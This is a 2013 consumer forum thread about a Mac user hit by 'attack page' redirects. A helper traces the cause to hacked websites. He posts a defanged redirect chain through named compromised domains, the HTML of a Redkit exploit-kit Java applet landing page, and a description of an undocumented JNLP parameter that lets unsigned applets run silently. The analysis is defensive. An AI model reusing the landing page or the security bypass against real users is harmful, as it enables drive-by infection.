Macbook web page redirecting

netballdi · 24 May 2013 at 10:38PM

I have a problem when i click on certain webpages it automatically comes up with "attack page" redirect to https://www.atv-haltern-volleyball.de.
I assume this is some type of spyware or something?? I am not technically minded so don't really know.
Any idea how i can get rid of this ?
Many thanks

Openwind_Curse · 24 May 2013 at 11:21PM

Hey Netballdi,

As you're with a Mac, there aren't many free options for removing spyware on your computer. What anti-virus software do you have (if any), and what is your budget for potentially getting a new one?

I agree that it is spyware, and there are boards on the internet that specialize in self-remedying these type of issues, or you can bring it to a trusted computer store. You can also try your hand at contacting Apple Support who may have more specific instructions than I do.

waddler_8 · 24 May 2013 at 11:40PM

Openwind_Curse wrote: »

I agree that it is spyware

My initial research suggests the problem is web based with a number of Joomla powered websites being infected & redirecting to the the aforementioned site.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=westcountrycookers.com

http://www.google.com/safebrowsing/diagnostic?site=http://www.atv-haltern-volleyball.de/&hl=en

waddler_8 · 25 May 2013 at 12:29AM

Serves up a Java exploit via the Redkit exploit kit.

GET hxxp://westcountrycookers.com/
302 Moved Temporarily to hxxp://www.atv-haltern-volleyball.de/includes/domit/xml_domit_lites_parser.php

GET hxxp://www.atv-haltern-volleyball.de/includes/domit/xml_domit_lites_parser.php
302 Found to hxxp://www.shifajeddah.com/includes/PEAR/include/www/all.php

GET hxxp://www.shifajeddah.com/includes/PEAR/include/www/all.php
302 Found to hxxp://peicentre-ng.com/cache/1.php

GET hxxp://peicentre-ng.com/cache/1.php
302 Moved Temporarily to hxxp://screex.de/wgdb.html

GET hxxp://screex.de/wgdb.html
200 OK (text/html)

CONNECT hxxp://urs.microsoft.com:443
200 Connection Established ()

GET hxxp://screex.de/favicon.ico
404 Not Found (text/html)

Source code of hxxp://screex.de/wgdb.html

<html><body><title>Mannaro</title><applet name="Cahsarkr">Your browser doesnot support this<param name="jnlp_href" value="rg.jnlp">opp</param><param name="name" value="/vvi299.6&ooms5o91?s/vfh"></param></applet></body></html>

http://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/

The JNLP file referenced in the landing page (above) reveals a security bypass that is being used by several of the active exploit kits. The attacks make use of an undocumented parameter (__applet_ssv_validated) to bypass security restrictions, and enable silent (no user prompt) execution of an unsigned applet.

netballdi · 25 May 2013 at 8:16AM

Thanks for the reply, but being not very technical, I haven't a clue what you have said !!!!
I will try ringing Apple support today I think.

waddler_8 · 25 May 2013 at 9:16AM

As it's only happens "on certain webpages" I'm sure the fault lies with the website's you are visiting rather than your computer - They've been hacked.

Scan it with an antivirus to see if anything is detected - http://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-mac-home-edition.aspx

netballdi · 25 May 2013 at 9:57AM

Many thanks, i will try that !

waddler_8 · 25 May 2013 at 10:05AM

If you give one example of a website you get the warning from I can check it out.

DO NOT post a live link - Just put website dot com

netballdi · 25 May 2013 at 12:44PM

I get it from an estate agents, pageandwells.com

waddler_8 · 25 May 2013 at 12:58PM

Yes, it's the actual website that has been compromised.

I got the same redirection as above.

netballdi · 25 May 2013 at 1:17PM

So it's their problem rather than mine ??

Macbook web page redirecting

Comments

Confirm your email address to Create Threads and Reply

🚀 Getting Started

Categories

Is this how you want to be seen?

Get our FREE Weekly email full of deals & guides - and it’s spam-free